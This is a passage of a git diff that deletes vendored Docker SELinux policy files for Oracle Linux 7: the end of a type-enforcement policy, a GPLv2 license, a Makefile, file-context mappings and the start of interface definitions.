-corenet_udp_sendrecv_generic_if(docker_t)
-corenet_udp_sendrecv_generic_node(docker_t)
-corenet_udp_sendrecv_all_ports(docker_t)
-corenet_udp_bind_generic_node(docker_t)
-corenet_udp_bind_all_ports(docker_t)
-
-files_read_config_files(docker_t)
-files_dontaudit_getattr_all_dirs(docker_t)
-files_dontaudit_getattr_all_files(docker_t)
-
-fs_read_cgroup_files(docker_t)
-fs_read_tmpfs_symlinks(docker_t)
-fs_search_all(docker_t)
-fs_getattr_all_fs(docker_t)
-
-storage_raw_rw_fixed_disk(docker_t)
-
-auth_use_nsswitch(docker_t)
-auth_dontaudit_getattr_shadow(docker_t)
-
-init_read_state(docker_t)
-init_status(docker_t)
-
-logging_send_audit_msgs(docker_t)
-logging_send_syslog_msg(docker_t)
-
-miscfiles_read_localization(docker_t)
-
-mount_domtrans(docker_t)
-
-seutil_read_default_contexts(docker_t)
-seutil_read_config(docker_t)
-
-sysnet_dns_name_resolve(docker_t)
-sysnet_exec_ifconfig(docker_t)
-
-optional_policy(`
-	rpm_exec(docker_t)
-	rpm_read_db(docker_t)
-	rpm_exec(docker_t)
-')
-
-optional_policy(`
-	fstools_domtrans(docker_t)
-')
-
-optional_policy(`
-	iptables_domtrans(docker_t)
-')
-
-optional_policy(`
-	openvswitch_stream_connect(docker_t)
-')
-
-#
-# lxc rules
-#
-
-allow docker_t self:capability { dac_override setgid setpcap setuid sys_admin sys_boot sys_chroot sys_ptrace };
-
-allow docker_t self:process { getcap setcap setexec setpgid setsched signal_perms };
-
-allow docker_t self:netlink_route_socket rw_netlink_socket_perms;;
-allow docker_t self:netlink_audit_socket create_netlink_socket_perms;
-allow docker_t self:unix_dgram_socket { create_socket_perms sendto };
-allow docker_t self:unix_stream_socket { create_stream_socket_perms connectto };
-
-allow docker_t docker_var_lib_t:dir mounton;
-allow docker_t docker_var_lib_t:chr_file mounton;
-can_exec(docker_t, docker_var_lib_t)
-
-kernel_dontaudit_setsched(docker_t)
-kernel_get_sysvipc_info(docker_t)
-kernel_request_load_module(docker_t)
-kernel_mounton_messages(docker_t)
-kernel_mounton_all_proc(docker_t)
-kernel_mounton_all_sysctls(docker_t)
-kernel_unlabeled_entry_type(spc_t)
-kernel_unlabeled_domtrans(docker_t, spc_t)
-
-dev_getattr_all(docker_t)
-dev_getattr_sysfs_fs(docker_t)
-dev_read_urand(docker_t)
-dev_read_lvm_control(docker_t)
-dev_rw_sysfs(docker_t)
-dev_rw_loop_control(docker_t)
-dev_rw_lvm_control(docker_t)
-
-files_getattr_isid_type_dirs(docker_t)
-files_manage_isid_type_dirs(docker_t)
-files_manage_isid_type_files(docker_t)
-files_manage_isid_type_symlinks(docker_t)
-files_manage_isid_type_chr_files(docker_t)
-files_manage_isid_type_blk_files(docker_t)
-files_exec_isid_files(docker_t)
-files_mounton_isid(docker_t)
-files_mounton_non_security(docker_t)
-files_mounton_isid_type_chr_file(docker_t)
-
-fs_mount_all_fs(docker_t)
-fs_unmount_all_fs(docker_t)
-fs_remount_all_fs(docker_t)
-files_mounton_isid(docker_t)
-fs_manage_cgroup_dirs(docker_t)
-fs_manage_cgroup_files(docker_t)
-fs_relabelfrom_xattr_fs(docker_t)
-fs_relabelfrom_tmpfs(docker_t)
-fs_read_tmpfs_symlinks(docker_t)
-fs_list_hugetlbfs(docker_t)
-
-term_use_generic_ptys(docker_t)
-term_use_ptmx(docker_t)
-term_getattr_pty_fs(docker_t)
-term_relabel_pty_fs(docker_t)
-term_mounton_unallocated_ttys(docker_t)
-
-modutils_domtrans_insmod(docker_t)
-
-systemd_status_all_unit_files(docker_t)
-systemd_start_systemd_services(docker_t)
-
-userdom_stream_connect(docker_t)
-userdom_search_user_home_content(docker_t)
-userdom_read_all_users_state(docker_t)
-userdom_relabel_user_home_files(docker_t)
-userdom_relabel_user_tmp_files(docker_t)
-userdom_relabel_user_tmp_dirs(docker_t)
-
-optional_policy(`
-	gpm_getattr_gpmctl(docker_t)
-')
-
-optional_policy(`
-	dbus_system_bus_client(docker_t)
-	init_dbus_chat(docker_t)
-	init_start_transient_unit(docker_t)
-
-	optional_policy(`
-		systemd_dbus_chat_logind(docker_t)
-		systemd_dbus_chat_machined(docker_t)
-	')
-
-	optional_policy(`
-		firewalld_dbus_chat(docker_t)
-	')
-')
-
-optional_policy(`
-	udev_read_db(docker_t)
-')
-
-optional_policy(`
-	unconfined_domain(docker_t)
-	unconfined_typebounds(docker_t)
-')
-
-optional_policy(`
-	virt_read_config(docker_t)
-	virt_exec(docker_t)
-	virt_stream_connect(docker_t)
-	virt_stream_connect_sandbox(docker_t)
-	virt_exec_sandbox_files(docker_t)
-	virt_manage_sandbox_files(docker_t)
-	virt_relabel_sandbox_filesystem(docker_t)
-	# for lxc
-	virt_transition_svirt_sandbox(docker_t, system_r)
-	virt_mounton_sandbox_file(docker_t)
-#	virt_attach_sandbox_tun_iface(docker_t)
-	allow docker_t svirt_sandbox_domain:tun_socket relabelfrom;
-	virt_sandbox_entrypoint(docker_t)	
-')
-
-tunable_policy(`docker_connect_any',`
-    corenet_tcp_connect_all_ports(docker_t)
-    corenet_sendrecv_all_packets(docker_t)
-    corenet_tcp_sendrecv_all_ports(docker_t)
-')
-
-########################################
-#
-# spc local policy
-#
-allow spc_t { docker_var_lib_t docker_share_t }:file entrypoint;
-role system_r types spc_t;
-
-domtrans_pattern(docker_t, docker_share_t, spc_t)
-domtrans_pattern(docker_t, docker_var_lib_t, spc_t)
-allow docker_t spc_t:process { setsched signal_perms };
-ps_process_pattern(docker_t, spc_t)
-allow docker_t spc_t:socket_class_set { relabelto relabelfrom };
-filetrans_pattern(docker_t, docker_var_lib_t, docker_share_t, dir, "overlay")
-
-optional_policy(`
-	systemd_dbus_chat_machined(spc_t)
-')
-
-optional_policy(`
-	dbus_chat_system_bus(spc_t)
-')
-
-optional_policy(`
-	unconfined_domain_noaudit(spc_t)
-')
-
-optional_policy(`
-	virt_transition_svirt_sandbox(spc_t, system_r)
-	virt_sandbox_entrypoint(spc_t)	
-')
-
-########################################
-#
-# docker_auth local policy
-#
-allow docker_auth_t self:fifo_file rw_fifo_file_perms;
-allow docker_auth_t self:unix_stream_socket create_stream_socket_perms;
-dontaudit docker_auth_t self:capability net_admin;
-
-docker_stream_connect(docker_auth_t)
-
-manage_dirs_pattern(docker_auth_t, docker_plugin_var_run_t, docker_plugin_var_run_t)
-manage_files_pattern(docker_auth_t, docker_plugin_var_run_t, docker_plugin_var_run_t)
-manage_sock_files_pattern(docker_auth_t, docker_plugin_var_run_t, docker_plugin_var_run_t)
-manage_lnk_files_pattern(docker_auth_t, docker_plugin_var_run_t, docker_plugin_var_run_t)
-files_pid_filetrans(docker_auth_t, docker_plugin_var_run_t, { dir file lnk_file sock_file })
-
-domain_use_interactive_fds(docker_auth_t)
-
-kernel_read_net_sysctls(docker_auth_t)
-
-auth_use_nsswitch(docker_auth_t)
-
-files_read_etc_files(docker_auth_t)
-
-miscfiles_read_localization(docker_auth_t)
-
-sysnet_dns_name_resolve(docker_auth_t)
diff --git a/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/LICENSE b/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/LICENSE
deleted file mode 100644
index d511905c16..0000000000
--- a/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/LICENSE
+++ /dev/null
@@ -1,339 +0,0 @@
-		    GNU GENERAL PUBLIC LICENSE
-		       Version 2, June 1991
-
- Copyright (C) 1989, 1991 Free Software Foundation, Inc.,
- 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
- Everyone is permitted to copy and distribute verbatim copies
- of this license document, but changing it is not allowed.
-
-			    Preamble
-
-  The licenses for most software are designed to take away your
-freedom to share and change it.  By contrast, the GNU General Public
-License is intended to guarantee your freedom to share and change free
-software--to make sure the software is free for all its users.  This
-General Public License applies to most of the Free Software
-Foundation's software and to any other program whose authors commit to
-using it.  (Some other Free Software Foundation software is covered by
-the GNU Lesser General Public License instead.)  You can apply it to
-your programs, too.
-
-  When we speak of free software, we are referring to freedom, not
-price.  Our General Public Licenses are designed to make sure that you
-have the freedom to distribute copies of free software (and charge for
-this service if you wish), that you receive source code or can get it
-if you want it, that you can change the software or use pieces of it
-in new free programs; and that you know you can do these things.
-
-  To protect your rights, we need to make restrictions that forbid
-anyone to deny you these rights or to ask you to surrender the rights.
-These restrictions translate to certain responsibilities for you if you
-distribute copies of the software, or if you modify it.
-
-  For example, if you distribute copies of such a program, whether
-gratis or for a fee, you must give the recipients all the rights that
-you have.  You must make sure that they, too, receive or can get the
-source code.  And you must show them these terms so they know their
-rights.
-
-  We protect your rights with two steps: (1) copyright the software, and
-(2) offer you this license which gives you legal permission to copy,
-distribute and/or modify the software.
-
-  Also, for each author's protection and ours, we want to make certain
-that everyone understands that there is no warranty for this free
-software.  If the software is modified by someone else and passed on, we
-want its recipients to know that what they have is not the original, so
-that any problems introduced by others will not reflect on the original
-authors' reputations.
-
-  Finally, any free program is threatened constantly by software
-patents.  We wish to avoid the danger that redistributors of a free
-program will individually obtain patent licenses, in effect making the
-program proprietary.  To prevent this, we have made it clear that any
-patent must be licensed for everyone's free use or not licensed at all.
-
-  The precise terms and conditions for copying, distribution and
-modification follow.
-
-		    GNU GENERAL PUBLIC LICENSE
-   TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
-
-  0. This License applies to any program or other work which contains
-a notice placed by the copyright holder saying it may be distributed
-under the terms of this General Public License.  The "Program", below,
-refers to any such program or work, and a "work based on the Program"
-means either the Program or any derivative work under copyright law:
-that is to say, a work containing the Program or a portion of it,
-either verbatim or with modifications and/or translated into another
-language.  (Hereinafter, translation is included without limitation in
-the term "modification".)  Each licensee is addressed as "you".
-
-Activities other than copying, distribution and modification are not
-covered by this License; they are outside its scope.  The act of
-running the Program is not restricted, and the output from the Program
-is covered only if its contents constitute a work based on the
-Program (independent of having been made by running the Program).
-Whether that is true depends on what the Program does.
-
-  1. You may copy and distribute verbatim copies of the Program's
-source code as you receive it, in any medium, provided that you
-conspicuously and appropriately publish on each copy an appropriate
-copyright notice and disclaimer of warranty; keep intact all the
-notices that refer to this License and to the absence of any warranty;
-and give any other recipients of the Program a copy of this License
-along with the Program.
-
-You may charge a fee for the physical act of transferring a copy, and
-you may at your option offer warranty protection in exchange for a fee.
-
-  2. You may modify your copy or copies of the Program or any portion
-of it, thus forming a work based on the Program, and copy and
-distribute such modifications or work under the terms of Section 1
-above, provided that you also meet all of these conditions:
-
-    a) You must cause the modified files to carry prominent notices
-    stating that you changed the files and the date of any change.
-
-    b) You must cause any work that you distribute or publish, that in
-    whole or in part contains or is derived from the Program or any
-    part thereof, to be licensed as a whole at no charge to all third
-    parties under the terms of this License.
-
-    c) If the modified program normally reads commands interactively
-    when run, you must cause it, when started running for such
-    interactive use in the most ordinary way, to print or display an
-    announcement including an appropriate copyright notice and a
-    notice that there is no warranty (or else, saying that you provide
-    a warranty) and that users may redistribute the program under
-    these conditions, and telling the user how to view a copy of this
-    License.  (Exception: if the Program itself is interactive but
-    does not normally print such an announcement, your work based on
-    the Program is not required to print an announcement.)
-
-These requirements apply to the modified work as a whole.  If
-identifiable sections of that work are not derived from the Program,
-and can be reasonably considered independent and separate works in
-themselves, then this License, and its terms, do not apply to those
-sections when you distribute them as separate works.  But when you
-distribute the same sections as part of a whole which is a work based
-on the Program, the distribution of the whole must be on the terms of
-this License, whose permissions for other licensees extend to the
-entire whole, and thus to each and every part regardless of who wrote it.
-
-Thus, it is not the intent of this section to claim rights or contest
-your rights to work written entirely by you; rather, the intent is to
-exercise the right to control the distribution of derivative or
-collective works based on the Program.
-
-In addition, mere aggregation of another work not based on the Program
-with the Program (or with a work based on the Program) on a volume of
-a storage or distribution medium does not bring the other work under
-the scope of this License.
-
-  3. You may copy and distribute the Program (or a work based on it,
-under Section 2) in object code or executable form under the terms of
-Sections 1 and 2 above provided that you also do one of the following:
-
-    a) Accompany it with the complete corresponding machine-readable
-    source code, which must be distributed under the terms of Sections
-    1 and 2 above on a medium customarily used for software interchange; or,
-
-    b) Accompany it with a written offer, valid for at least three
-    years, to give any third party, for a charge no more than your
-    cost of physically performing source distribution, a complete
-    machine-readable copy of the corresponding source code, to be
-    distributed under the terms of Sections 1 and 2 above on a medium
-    customarily used for software interchange; or,
-
-    c) Accompany it with the information you received as to the offer
-    to distribute corresponding source code.  (This alternative is
-    allowed only for noncommercial distribution and only if you
-    received the program in object code or executable form with such
-    an offer, in accord with Subsection b above.)
-
-The source code for a work means the preferred form of the work for
-making modifications to it.  For an executable work, complete source
-code means all the source code for all modules it contains, plus any
-associated interface definition files, plus the scripts used to
-control compilation and installation of the executable.  However, as a
-special exception, the source code distributed need not include
-anything that is normally distributed (in either source or binary
-form) with the major components (compiler, kernel, and so on) of the
-operating system on which the executable runs, unless that component
-itself accompanies the executable.
-
-If distribution of executable or object code is made by offering
-access to copy from a designated place, then offering equivalent
-access to copy the source code from the same place counts as
-distribution of the source code, even though third parties are not
-compelled to copy the source along with the object code.
-
-  4. You may not copy, modify, sublicense, or distribute the Program
-except as expressly provided under this License.  Any attempt
-otherwise to copy, modify, sublicense or distribute the Program is
-void, and will automatically terminate your rights under this License.
-However, parties who have received copies, or rights, from you under
-this License will not have their licenses terminated so long as such
-parties remain in full compliance.
-
-  5. You are not required to accept this License, since you have not
-signed it.  However, nothing else grants you permission to modify or
-distribute the Program or its derivative works.  These actions are
-prohibited by law if you do not accept this License.  Therefore, by
-modifying or distributing the Program (or any work based on the
-Program), you indicate your acceptance of this License to do so, and
-all its terms and conditions for copying, distributing or modifying
-the Program or works based on it.
-
-  6. Each time you redistribute the Program (or any work based on the
-Program), the recipient automatically receives a license from the
-original licensor to copy, distribute or modify the Program subject to
-these terms and conditions.  You may not impose any further
-restrictions on the recipients' exercise of the rights granted herein.
-You are not responsible for enforcing compliance by third parties to
-this License.
-
-  7. If, as a consequence of a court judgment or allegation of patent
-infringement or for any other reason (not limited to patent issues),
-conditions are imposed on you (whether by court order, agreement or
-otherwise) that contradict the conditions of this License, they do not
-excuse you from the conditions of this License.  If you cannot
-distribute so as to satisfy simultaneously your obligations under this
-License and any other pertinent obligations, then as a consequence you
-may not distribute the Program at all.  For example, if a patent
-license would not permit royalty-free redistribution of the Program by
-all those who receive copies directly or indirectly through you, then
-the only way you could satisfy both it and this License would be to
-refrain entirely from distribution of the Program.
-
-If any portion of this section is held invalid or unenforceable under
-any particular circumstance, the balance of the section is intended to
-apply and the section as a whole is intended to apply in other
-circumstances.
-
-It is not the purpose of this section to induce you to infringe any
-patents or other property right claims or to contest validity of any
-such claims; this section has the sole purpose of protecting the
-integrity of the free software distribution system, which is
-implemented by public license practices.  Many people have made
-generous contributions to the wide range of software distributed
-through that system in reliance on consistent application of that
-system; it is up to the author/donor to decide if he or she is willing
-to distribute software through any other system and a licensee cannot
-impose that choice.
-
-This section is intended to make thoroughly clear what is believed to
-be a consequence of the rest of this License.
-
-  8. If the distribution and/or use of the Program is restricted in
-certain countries either by patents or by copyrighted interfaces, the
-original copyright holder who places the Program under this License
-may add an explicit geographical distribution limitation excluding
-those countries, so that distribution is permitted only in or among
-countries not thus excluded.  In such case, this License incorporates
-the limitation as if written in the body of this License.
-
-  9. The Free Software Foundation may publish revised and/or new versions
-of the General Public License from time to time.  Such new versions will
-be similar in spirit to the present version, but may differ in detail to
-address new problems or concerns.
-
-Each version is given a distinguishing version number.  If the Program
-specifies a version number of this License which applies to it and "any
-later version", you have the option of following the terms and conditions
-either of that version or of any later version published by the Free
-Software Foundation.  If the Program does not specify a version number of
-this License, you may choose any version ever published by the Free Software
-Foundation.
-
-  10. If you wish to incorporate parts of the Program into other free
-programs whose distribution conditions are different, write to the author
-to ask for permission.  For software which is copyrighted by the Free
-Software Foundation, write to the Free Software Foundation; we sometimes
-make exceptions for this.  Our decision will be guided by the two goals
-of preserving the free status of all derivatives of our free software and
-of promoting the sharing and reuse of software generally.
-
-			    NO WARRANTY
-
-  11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY
-FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW.  EXCEPT WHEN
-OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES
-PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED
-OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
-MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.  THE ENTIRE RISK AS
-TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU.  SHOULD THE
-PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING,
-REPAIR OR CORRECTION.
-
-  12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
-WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR
-REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES,
-INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING
-OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED
-TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY
-YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER
-PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
-POSSIBILITY OF SUCH DAMAGES.
-
-		     END OF TERMS AND CONDITIONS
-
-	    How to Apply These Terms to Your New Programs
-
-  If you develop a new program, and you want it to be of the greatest
-possible use to the public, the best way to achieve this is to make it
-free software which everyone can redistribute and change under these terms.
-
-  To do so, attach the following notices to the program.  It is safest
-to attach them to the start of each source file to most effectively
-convey the exclusion of warranty; and each file should have at least
-the "copyright" line and a pointer to where the full notice is found.
-
-    <one line to give the program's name and a brief idea of what it does.>
-    Copyright (C) <year>  <name of author>
-
-    This program is free software; you can redistribute it and/or modify
-    it under the terms of the GNU General Public License as published by
-    the Free Software Foundation; either version 2 of the License, or
-    (at your option) any later version.
-
-    This program is distributed in the hope that it will be useful,
-    but WITHOUT ANY WARRANTY; without even the implied warranty of
-    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-    GNU General Public License for more details.
-
-    You should have received a copy of the GNU General Public License along
-    with this program; if not, write to the Free Software Foundation, Inc.,
-    51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
-
-Also add information on how to contact you by electronic and paper mail.
-
-If the program is interactive, make it output a short notice like this
-when it starts in an interactive mode:
-
-    Gnomovision version 69, Copyright (C) year name of author
-    Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
-    This is free software, and you are welcome to redistribute it
-    under certain conditions; type `show c' for details.
-
-The hypothetical commands `show w' and `show c' should show the appropriate
-parts of the General Public License.  Of course, the commands you use may
-be called something other than `show w' and `show c'; they could even be
-mouse-clicks or menu items--whatever suits your program.
-
-You should also get your employer (if you work as a programmer) or your
-school, if any, to sign a "copyright disclaimer" for the program, if
-necessary.  Here is a sample; alter the names:
-
-  Yoyodyne, Inc., hereby disclaims all copyright interest in the program
-  `Gnomovision' (which makes passes at compilers) written by James Hacker.
-
-  <signature of Ty Coon>, 1 April 1989
-  Ty Coon, President of Vice
-
-This General Public License does not permit incorporating your program into
-proprietary programs.  If your program is a subroutine library, you may
-consider it more useful to permit linking proprietary applications with the
-library.  If this is what you want to do, use the GNU Lesser General
-Public License instead of this License.
diff --git a/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/Makefile b/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/Makefile
deleted file mode 100644
index 16df33ef32..0000000000
--- a/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/Makefile
+++ /dev/null
@@ -1,23 +0,0 @@
-TARGETS?=docker
-MODULES?=${TARGETS:=.pp.bz2}
-SHAREDIR?=/usr/share
-
-all: ${TARGETS:=.pp.bz2}
-
-%.pp.bz2: %.pp
-	@echo Compressing $^ -\> $@
-	bzip2 -9 $^
-
-%.pp: %.te
-	make -f ${SHAREDIR}/selinux/devel/Makefile $@
-
-clean:
-	rm -f *~  *.tc *.pp *.pp.bz2
-	rm -rf tmp *.tar.gz
-
-man: install
-	sepolicy manpage --domain ${TARGETS}_t
-
-install:
-	semodule -i ${TARGETS}
-
diff --git a/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/README.md b/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/README.md
deleted file mode 100644
index 7ea3117a89..0000000000
--- a/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/README.md
+++ /dev/null
@@ -1 +0,0 @@
-SELinux policy for docker
diff --git a/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/docker.fc b/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/docker.fc
deleted file mode 100644
index 10b7d52a8b..0000000000
--- a/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/docker.fc
+++ /dev/null
@@ -1,33 +0,0 @@
-/root/\.docker	gen_context(system_u:object_r:docker_home_t,s0)
-
-/usr/bin/docker			--	gen_context(system_u:object_r:docker_exec_t,s0)
-/usr/bin/docker-novolume-plugin		--	gen_context(system_u:object_r:docker_auth_exec_t,s0)
-/usr/lib/docker/docker-novolume-plugin	--	gen_context(system_u:object_r:docker_auth_exec_t,s0)
-
-/usr/lib/systemd/system/docker.service		--	gen_context(system_u:object_r:docker_unit_file_t,s0)
-/usr/lib/systemd/system/docker-novolume-plugin.service	--	gen_context(system_u:object_r:docker_unit_file_t,s0)
-
-/etc/docker(/.*)?		gen_context(system_u:object_r:docker_config_t,s0)
-
-/var/lib/docker(/.*)?		gen_context(system_u:object_r:docker_var_lib_t,s0)
-/var/lib/kublet(/.*)?		gen_context(system_u:object_r:docker_var_lib_t,s0)
-/var/lib/docker/vfs(/.*)?	gen_context(system_u:object_r:svirt_sandbox_file_t,s0)
-
-/var/run/docker(/.*)?		gen_context(system_u:object_r:docker_var_run_t,s0)
-/var/run/docker\.pid		--	gen_context(system_u:object_r:docker_var_run_t,s0)
-/var/run/docker\.sock		-s	gen_context(system_u:object_r:docker_var_run_t,s0)
-/var/run/docker-client(/.*)?		gen_context(system_u:object_r:docker_var_run_t,s0)
-/var/run/docker/plugins(/.*)?		gen_context(system_u:object_r:docker_plugin_var_run_t,s0)
-
-/var/lock/lxc(/.*)?		gen_context(system_u:object_r:docker_lock_t,s0)
-
-/var/log/lxc(/.*)?		gen_context(system_u:object_r:docker_log_t,s0)
-
-/var/lib/docker/init(/.*)?		gen_context(system_u:object_r:docker_share_t,s0)
-/var/lib/docker/containers/.*/hosts		gen_context(system_u:object_r:docker_share_t,s0)
-/var/lib/docker/containers/.*/hostname		gen_context(system_u:object_r:docker_share_t,s0)
-/var/lib/docker/.*/config\.env	gen_context(system_u:object_r:docker_share_t,s0)
-
-# OL7.2 systemd selinux update
-/var/run/systemd/machines(/.*)?        gen_context(system_u:object_r:systemd_machined_var_run_t,s0)
-/var/lib/machines(/.*)?                        gen_context(system_u:object_r:systemd_machined_var_lib_t,s0)
diff --git a/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/docker.if b/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/docker.if
deleted file mode 100644
index 4780af05f7..0000000000
--- a/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/docker.if
+++ /dev/null
@@ -1,659 +0,0 @@
-
-## <summary>The open-source application container engine.</summary>
-
-########################################
-## <summary>
-##	Execute docker in the docker domain.
-## </summary>
-## <param name="domain">
-## <summary>
-##	Domain allowed to transition.
-## </summary>
-## </param>
-#
-interface(`docker_domtrans',`
-	gen_require(`
-		type docker_t, docker_exec_t;
-	')
-
-	corecmd_search_bin($1)
-	domtrans_pattern($1, docker_exec_t, docker_t)
-')
-
-########################################
-## <summary>
-##	Execute docker in the caller domain.
-## </summary>
-## <param name="domain">
-## <summary>
-##	Domain allowed to transition.
-## </summary>
-## </param>
-#
-interface(`docker_exec',`
-	gen_require(`
-		type docker_exec_t;
-	')
-
-	corecmd_search_bin($1)
-	can_exec($1, docker_exec_t)
-')
-
-########################################
-## <summary>
-##	Search docker lib directories.
-## </summary>
-## <param name="domain">
-##	<summary>
-##	Domain allowed access.
-##	</summary>
-## </param>
-#
-interface(`docker_search_lib',`
-	gen_require(`
-		type docker_var_lib_t;
-	')
-
-	allow $1 docker_var_lib_t:dir search_dir_perms;
-	files_search_var_lib($1)
-')
-
-########################################
-## <summary>
-##	Execute docker lib directories.
-## </summary>
-## <param name="domain">
-##	<summary>
-##	Domain allowed access.
-##	</summary>
-## </param>
-#
-interface(`docker_exec_lib',`
-	gen_require(`
-		type docker_var_lib_t;
-	')
-
-	allow $1 docker_var_lib_t:dir search_dir_perms;
-	can_exec($1, docker_var_lib_t)
-')
-
-########################################
-## <summary>
-##	Read docker lib files.
-## </summary>
-## <param name="domain">
-##	<summary>
-##	Domain allowed access.
-##	</summary>
-## </param>
-#
-interface(`docker_read_lib_files',`
-	gen_require(`
-		type docker_var_lib_t;
-	')
-
-	files_search_var_lib($1)
-	read_files_pattern($1, docker_var_lib_t, docker_var_lib_t)
-')
-
-########################################
-## <summary>
-##	Read docker share files.
-## </summary>
-## <param name="domain">
-##	<summary>
-##	Domain allowed access.
-##	</summary>
-## </param>
-#
-interface(`docker_read_share_files',`
-	gen_require(`
-		type docker_share_t;
-	')
-
-	files_search_var_lib($1)
-	list_dirs_pattern($1, docker_share_t, docker_share_t)
-	read_files_pattern($1, docker_share_t, docker_share_t)
-	read_lnk_files_pattern($1, docker_share_t, docker_share_t)
-')
-
-######################################
-## <summary>
-##	Allow the specified domain to execute docker shared files
-##	in the caller domain.
-## </summary>
-## <param name="domain">
-##	<summary>
-##	Domain allowed access.
-##	</summary>
-## </param>
-#
-interface(`docker_exec_share_files',`
-	gen_require(`
-		type docker_share_t;
-	')
-
-	can_exec($1, docker_share_t)
-')
-
-########################################
-## <summary>
-##	Manage docker lib files.
-## </summary>
-## <param name="domain">
-##	<summary>
-##	Domain allowed access.
-##	</summary>
-## </param>
-#
-interface(`docker_manage_lib_files',`
-	gen_require(`
-		type docker_var_lib_t;
-	')
-
-	files_search_var_lib($1)
-	manage_files_pattern($1, docker_var_lib_t, docker_var_lib_t)
-	manage_lnk_files_pattern($1, docker_var_lib_t, docker_var_lib_t)
-')
-
-########################################
-## <summary>
-##	Manage docker lib directories.
-## </summary>
-## <param name="domain">
-##	<summary>
-##	Domain allowed access.
-##	</summary>
-## </param>
-#
-interface(`docker_manage_lib_dirs',`
-	gen_require(`
-		type docker_var_lib_t;
-	')
-
-	files_search_var_lib($1)
-	manage_dirs_pattern($1, docker_var_lib_t, docker_var_lib_t)
-')
-
-########################################
-## <summary>
-##	Create objects in a docker var lib directory
-##	with an automatic type transition to
-##	a specified private type.
-## </summary>
-## <param name="domain">
-##	<summary>
-##	Domain allowed access.
-##	</summary>
-## </param>
-## <param name="private_type">
-##	<summary>
-##	The type of the object to create.
-##	</summary>
-## </param>
-## <param name="object_class">
-##	<summary>
-##	The class of the object to be created.
-##	</summary>
-## </param>
-## <param name="name" optional="true">
-##	<summary>
-##	The name of the object being created.
-##	</summary>
-## </param>
-#
-interface(`docker_lib_filetrans',`
-	gen_require(`
-		type docker_var_lib_t;
-	')
-
-	filetrans_pattern($1, docker_var_lib_t, $2, $3, $4)
-')
-
-########################################
-## <summary>
-##	Read docker PID files.
-## </summary>
-## <param name="domain">
-##	<summary>
-##	Domain allowed access.
-##	</summary>
-## </param>
-#
-interface(`docker_read_pid_files',`
-	gen_require(`
-		type docker_var_run_t;
-	')
-
-	files_search_pids($1)
-	read_files_pattern($1, docker_var_run_t, docker_var_run_t)
-')
-
-########################################
-## <summary>
-##	Execute docker server in the docker domain.
-## </summary>
-## <param name="domain">
-##	<summary>
-##	Domain allowed to transition.
-##	</summary>
-## </param>
-#
-interface(`docker_systemctl',`
-	gen_require(`
-		type docker_t;
-		type docker_unit_file_t;
-	')
-
-	systemd_exec_systemctl($1)
-	init_reload_services($1)
-        systemd_read_fifo_file_passwd_run($1)
-	allow $1 docker_unit_file_t:file read_file_perms;
-	allow $1 docker_unit_file_t:service manage_service_perms;
-
-	ps_process_pattern($1, docker_t)
-')
-
-########################################
-## <summary>
-##	Read and write docker shared memory.
-## </summary>
-## <param name="domain">
-##	<summary>
-##	Domain allowed access.
-##	</summary>
-## </param>
-#
-interface(`docker_rw_sem',`
-	gen_require(`
-		type docker_t;
-	')
-
-	allow $1 docker_t:sem rw_sem_perms;
-')
-
-#######################################
-## <summary>
-##  Read and write the docker pty type.
-## </summary>
-## <param name="domain">
-##  <summary>
-##  Domain allowed access.
-##  </summary>
-## </param>
-#
-interface(`docker_use_ptys',`
-    gen_require(`
-        type docker_devpts_t;
-    ')
-
-    allow $1 docker_devpts_t:chr_file rw_term_perms;
-')
-
-#######################################
-## <summary>
-##      Allow domain to create docker content
-## </summary>
-## <param name="domain">
-##      <summary>
-##      Domain allowed access.
-##      </summary>
-## </param>
-#
-interface(`docker_filetrans_named_content',`
-
-    gen_require(`
-        type docker_var_lib_t;
